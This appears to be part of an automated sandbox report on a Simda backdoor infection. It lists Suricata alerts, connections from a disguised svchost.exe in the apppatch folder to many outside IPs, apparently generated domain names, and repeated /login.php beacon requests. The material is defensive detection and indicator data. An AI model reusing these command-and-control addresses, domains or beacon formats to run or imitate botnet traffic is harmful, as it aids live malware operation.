Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49726 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49714 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49707 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49723 -> 188.114.97.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49725 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49724 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49717 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49705 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49739 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49708 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49742 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49735 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49734 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49731 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49733 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49730 -> 76.223.67.189:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49732 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49741 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:59357 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53598 -> 52.34.198.229:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63210 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63205 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63208 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:64830 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:61825 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63206 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49312 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:61826 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63209 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53522 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53519 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63207 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53544 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53548 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53526 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53523 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57970 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53552 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53524 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53557 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53555 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:55775
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53551 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53556 -> 76.223.67.189:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53527 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53521 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:62047 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53545 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57972 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53530 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53546 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53547 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57971 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53520 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49727 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63211 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49729 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49718 -> 75.2.71.199:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:61824 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63212 -> 75.2.71.199:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49721 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:63213 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49720 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:61823 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53540 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53549 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53554 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53531 -> 75.2.71.199:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:53543 -> 188.114.96.3:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vopyret.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyvynen.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumymap.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: purylal.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyryvex.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: gaqyres.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vocyjic.com
Queries Google from non browser process on port 80
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345856.5179536
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345856.5241611
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
